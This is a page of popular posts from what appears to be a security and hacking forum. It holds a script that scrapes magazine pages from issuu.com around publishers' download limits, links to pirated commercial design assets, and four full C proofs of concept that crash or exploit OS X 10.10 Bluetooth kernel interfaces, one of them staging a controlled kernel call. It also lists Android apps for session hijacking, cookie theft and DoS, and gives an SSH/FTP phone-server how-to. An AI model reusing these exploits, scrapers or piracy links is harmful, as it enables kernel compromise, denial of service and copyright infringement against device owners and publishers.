Leaderboard

Popular Content

Showing content with the highest reputation on 01/13/15 in all areas

  1. Hi, I had to write this script (for my girlfriend) and thought I'd share it with you too. issuu.com is a site where you can view all kinds of magazines from various fields (some in full, others not), and unfortunately not all publishers allow them to be downloaded.

     ```bash
     #!/bin/bash
     # Usage: ./script.sh magazine_link number_of_pages
     # Extract the magazine ID from the page's image_src link
     ID_REVISTA="$(curl -s "$1" | grep image_src | awk -F'/' '{print $4}')"
     i=1
     mkdir -p "$ID_REVISTA"
     cd "$ID_REVISTA" || exit 1
     # Fetch each page image in turn
     while (( i <= $2 ))
     do
         wget "http://image.issuu.com/$ID_REVISTA/jpg/page_$i.jpg"
         i=$(( i+1 ))
     done
     ```

     Run it as ./script.sh magazine_link number_of_pages_to_download

     e.g.: ./script.sh ISSUU - DeskMonsters - October 2014 by DESKMONSTERS 22

     You can modify it however you like if you need to. I didn't know how to write it differently or in another language. After running, it creates a local folder named after the magazine ID, which is unique, and dumps all the selected pages into it in .JPG format. Have fun!

     LE: thanks to the admin who moved the post. I didn't know exactly where to put it.
    2 points
  2. I got bored and figured I'd make the kids happy again. Have fun.

     Info: Christmas Photoshop Styles - Text Effects | GraphicRiver
     Zippyshare.com

     Info: Winter Style Text Effects - Bundle | GraphicRiver
     Zippyshare.com

     Info: Splatter Displacement Action | GraphicRiver
     Zippyshare.com

     Info: 40 Dark Background Patterns 2 | GraphicRiver
     Zippyshare.com

     Info: Rebecca Lily | Lightroom Presets and ACR Presets » Rebecca Lily Pro Presets – Set III
     Zippyshare.com - R.L.Pro Presets - Set III.rar

     Info: https://creativemarket.com/Linspace/109408-(75-OFF)-600-PS-Actions-Bundle
     Zippyshare.com

     Info: Christmas Sweet Styles | GraphicRiver
     Zippyshare.com

     Info: Abstract Photoshop Action Bundle | GraphicRiver
     Zippyshare.com

     Info: Points Pixelate Generator Action Set | GraphicRiver
     Zippyshare.com

     Info: Paper Art Action | GraphicRiver
     Zippyshare.com

     Info: 3D Metal Style Text Effect | GraphicRiver
     Zippyshare.com

     Info: Prism Photoshop Action | GraphicRiver
     Zippyshare.com

     Info: Pure Art Chalk Drawing | GraphicRiver
     RawChapu.7z

     Info: Vintage Throwback Actions | GraphicRiver
     Zippyshare.com
    1 point
  3. DOWNLOAD

     Password hint: Romanian Security Team

     P.S.: Please don't stick your nose in if you have never in your hacker life worked with MASM or don't know what MOV does.
    1 point
  4. OkayFreedom vpn https://www.okayfreedom.com/specials/windowsdeal/of
    1 point
  5. OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC

     ```c
     /*
      * lpe-issue1.c
      * Written for Mac OS X Yosemite (10.10.1) by @joystick and @rpaleari.
      *
      * Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey()
      *
      * gcc -Wall -o lpe-issue1{,.c} -framework IOKit
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     #define SIZE 0x1000

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     #ifndef bswap64
     # define bswap64(num) \
       ( (((uint64_t)(num) << 56) ) \
       | (((uint64_t)(num) << 40) & UINT64_C(0x00FF000000000000)) \
       | (((uint64_t)(num) << 24) & UINT64_C(0x0000FF0000000000)) \
       | (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \
       | (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \
       | (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \
       | (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \
       | (((uint64_t)(num) >> 56) ) )
     #endif

     void create_requests(io_connect_t port) {
       struct BluetoothCall a;
       uint32_t i;
       kern_return_t kr;

       for (i = 0; i < 7; i++) {
         a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
         a.sizes[i] = SIZE;
       }

       /* DispatchHCIRequestCreate() */
       a.index = 0x0;

       *(uint64_t *)a.args[0] = 5*1000; /* Timeout */
       memset((void *)a.args[1], 0x81, 0x1000);
       memset((void *)a.args[2], 0x82, 0x1000);
       memset((void *)a.args[3], 0x83, 0x1000);
       memset((void *)a.args[4], 0x84, 0x1000);
       memset((void *)a.args[5], 0x85, 0x1000);
       memset((void *)a.args[6], 0x86, 0x1000);

       for(i = 0; i < 500; i++) {
         kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                                  (uint32_t) 0,       /* Selector */
                                  NULL, 0,            /* input, inputCnt */
                                  (const void*) &a,   /* inputStruct */
                                  120,                /* inputStructCnt */
                                  NULL, NULL, NULL, NULL); /* Output stuff */

         if(kr == 0xe00002bd) /* Full */
           break;
       }
     }

     int main(void) {
       struct BluetoothCall a;
       int i;
       void *landing_page = calloc(SIZE, sizeof(char));

       /* Init a */
       for (i = 0; i < 7; i++) {
         a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
         a.sizes[i] = SIZE;
       }

       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault,
                                     IOServiceMatching("IOBluetoothHCIController"));

       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       /* Populating with fake requests. */
       create_requests(port);

       /* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
       a.index = 42;

       /* Req number */
       *((uint32_t *)a.args[0]) = 1;
       /* num_of_keys */
       *((uint32_t *)a.args[1]) = 0x20;
       /* Padding */
       memset((void *)a.args[3], 0x33, 152);

       /* mov rdi, [r14+0AB8h] */
       *((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
       /* mov rax, [rdi] */
       *((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
       /* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
       *((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;

       /* Here some fixing to the vtable is required to return cleanly after the exploit */

     #if 0
       /* Debug print */
       for(i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");
     #endif

       kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                                (uint32_t) 0,       /* Selector */
                                NULL, 0,            /* input, inputCnt */
                                (const void*) &a,   /* inputStruct */
                                120,                /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */
       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
     ```

     Source

     OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC

     ```c
     /*
      * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
      *
      * Exploits a missing check in
      * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic.
      *
      * gcc -Wall -o crash-issue1{,.c} -framework IOKit
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     #define SIZE 0x1000

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     int main(void) {
       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault,
                                     IOServiceMatching("IOBluetoothHCIController"));

       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       printf(" [+] Opened connection to service on port: %d\n", port);

       struct BluetoothCall a;
       int i;
       for (i=0; i<7; i++) {
         a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
         a.sizes[i] = SIZE;
       }

       /* This value causes IOMalloc() to fail */
       a.args[6] = 0x0;
       a.sizes[6] = 0x80000041;

       a.index = 0x06; /* DispatchHCICreateConnection() */

       for(i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");

       kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                                (uint32_t) 0,       /* Selector */
                                NULL, 0,            /* input, inputCnt */
                                (const void*) &a,   /* inputStruct */
                                120,                /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */
       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
     ```

     Source

     OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC

     ```c
     /*
      * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
      *
      * Exploits a missing check in
      * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic.
      *
      * gcc -Wall -o crash-issue3{,.c} -framework IOKit
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     int main(void) {
       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault,
                                     IOServiceMatching("IOBluetoothHCIController"));

       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       printf(" [+] Opened connection to service on port: %d\n", port);

       struct BluetoothCall a;

       memset(&a, 0, sizeof(a));

       a.sizes[0] = 0x1000;
       a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

       a.sizes[1] = 0x1000;
       a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
       memset((void *)a.args[1], 0x22, 0x1000);

       /* Call DispatchHCISendRawACLData() */
       a.index = 0x63;

       /* Debug */
       for(int i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");
       fflush(stdout);

       kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                                (uint32_t) 0,       /* Selector */
                                NULL, 0,            /* input, inputCnt */
                                (const void*) &a,   /* inputStruct */
                                sizeof(a),          /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */
       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
     ```

     Source

     OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC

     ```c
     /*
      * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
      *
      * Triggers a panic overwriting a stack_canary.
      *
      * gcc -Wall -o crash-issue2{,.c} -framework IOKit
      *
      */

     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>
     #include <mach/mach.h>
     #include <mach/vm_map.h>
     #include <IOKit/IOKitLib.h>

     struct BluetoothCall {
       uint64_t args[7];
       uint64_t sizes[7];
       uint64_t index;
     };

     int main(void) {
       /* Finding vuln service */
       io_service_t service =
         IOServiceGetMatchingService(kIOMasterPortDefault,
                                     IOServiceMatching("IOBluetoothHCIController"));

       if (!service) {
         return -1;
       }

       /* Connect to vuln service */
       io_connect_t port = (io_connect_t) 0;
       kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
       IOObjectRelease(service);
       if (kr != kIOReturnSuccess) {
         return kr;
       }

       printf(" [+] Opened connection to service on port: %d\n", port);

       struct BluetoothCall a;

       a.sizes[0] = 0x1000;
       a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

       /* This arguments overflows a local buffer and the adjacent stack canary */
       a.sizes[1] = 264;
       a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
       memset((void *)a.args[1], 'A', a.sizes[1]);

       /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
       a.index = 0x2d;

       /* Debug */
       for(int i = 0; i < 120; i++) {
         if(i % 8 == 0) printf("\n");
         printf("\\x%02x", ((unsigned char *)&a)[i]);
       }
       printf("\n");
       fflush(stdout);

       kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
                                (uint32_t) 0,       /* Selector */
                                NULL, 0,            /* input, inputCnt */
                                (const void*) &a,   /* inputStruct */
                                sizeof(a),          /* inputStructCnt */
                                NULL, NULL, NULL, NULL); /* Output stuff */
       printf("kr: %08x\n", kr);

       return IOServiceClose(port);
     }
     ```

     Source
    1 point
  6. Here we have, in no particular order, the top Android apps for hacking using an Android smartphone.

     Disclaimer: These apps should be used for research purposes only.

     1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009.

     2. Andosid:- The DOS tool for Android phones allows security professionals to simulate a DOS attack (an HTTP POST flood attack, to be exact) and of course a DDoS on a web server, from mobile phones.

     3. Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks.

     4. Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses.

     5. Anti-Android Network Toolkit:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

     6. SSHDroid:- SSHDroid is an SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc).

     7. WiFi Analyser:- Turns your Android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.

     8. Network Discovery:- Discover hosts and scan their ports in your WiFi network. A great tool for testing your network security.

     9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers.

     10. dSploit:- Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

     11. Hackode:- The hacker’s Toolbox is an application for penetration testers, ethical hackers, IT administrators and cyber security professionals to perform different tasks like reconnaissance, scanning, performing exploits, etc.

     12. Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the server.

     13. APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse Android applications. The goal of this project is to aid analysts and reverse engineers in visualizing compiled Android packages and their corresponding DEX code.

     14. DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications.

     15. Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

     16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device, and only the provider of the web service can protect the users. So anybody can test the security of his account by himself and can decide whether to keep on using the web service.

     17. AppUse:- Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free platform for mobile application security testing in the Android environment, and it includes unique custom-made tools created by AppSec Labs.

     18. Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open the dump use WireShark or similar software; to preview the dump on the phone use Shark Reader. Based on tcpdump.

     19. Fing:- Find out which devices are connected to your Wi-Fi network, in just a few seconds. Fast and accurate, Fing is a professional app for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues.

     20. Drozer:- drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload.

     21. WifiKill:- The second app, also developed by B.Ponury, is an app which can kill connections and kick site-hoggers from the site. This app definitely kicks the net user from the site so he cannot use it anymore. The app also offers the list of sites viewed by the hogger.

     22. DroidSniff:- Similar to DroidSheep but with a newer and nicer interface is DroidSniff – a sniffing app not only for Facebook. This app shows you what the hogger is looking for and then you can “take” his control, steal the cookies and rock’n’roll. Works perfectly.

     23. Network Spoofer:- The last app, called NetWork Spoofer, is very similar to dSploit but it’s easier to use. The only hitch is that you need to have at least 500MB of free data. It offers you a lot of troll features – change Google searches, flip images, redirect websites, swap YouTube videos and others.

     24. Droid SQLI:- Allows you to test your MySQL-based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: time based injection, blind injection, error based injection, normal injection.

     25. sqlmapchik:- A cross-platform sqlmap GUI for the extremely popular sqlmap tool.

     Source: The Top Android Apps for Hacking
    1 point
  7. SSHDroid

     It can be downloaded directly from Google Play, but you need a phone on which you have root rights. Once installed, you should go through the options and configure them to your liking.

     http://s28.postimg.org/5o17umiot/Screenshot_2015_01_13_10_54_11.png

     When the service is running, it looks roughly like this:

     http://s28.postimg.org/bxwhhmi3h/Screenshot_2015_01_13_10_52_49.png

     You can connect your PC to the same network, then connect to the phone over ssh (using putty or whatever you prefer):

     ~~~~~~~~~~~~

     If you happen to need an FTP server on your mobile phone, a similar application is FTPDroid.

     Lots of options (the configuration in the image is not very secure - I'll let you guess why):

     http://s28.postimg.org/4j75p8w7x/Screenshot_2015_01_13_10_58_32.png

     This is how the application looks when the service is running:

     http://s28.postimg.org/5zio7dz4t/Screenshot_2015_01_13_10_58_04.png

     And you can connect to the phone over ftp directly from the browser, or using your preferred ftp client:

     Take care to shut the services down (the STOP button in the application, top right), not just send them to the notification bar, otherwise they will remain running:
    1 point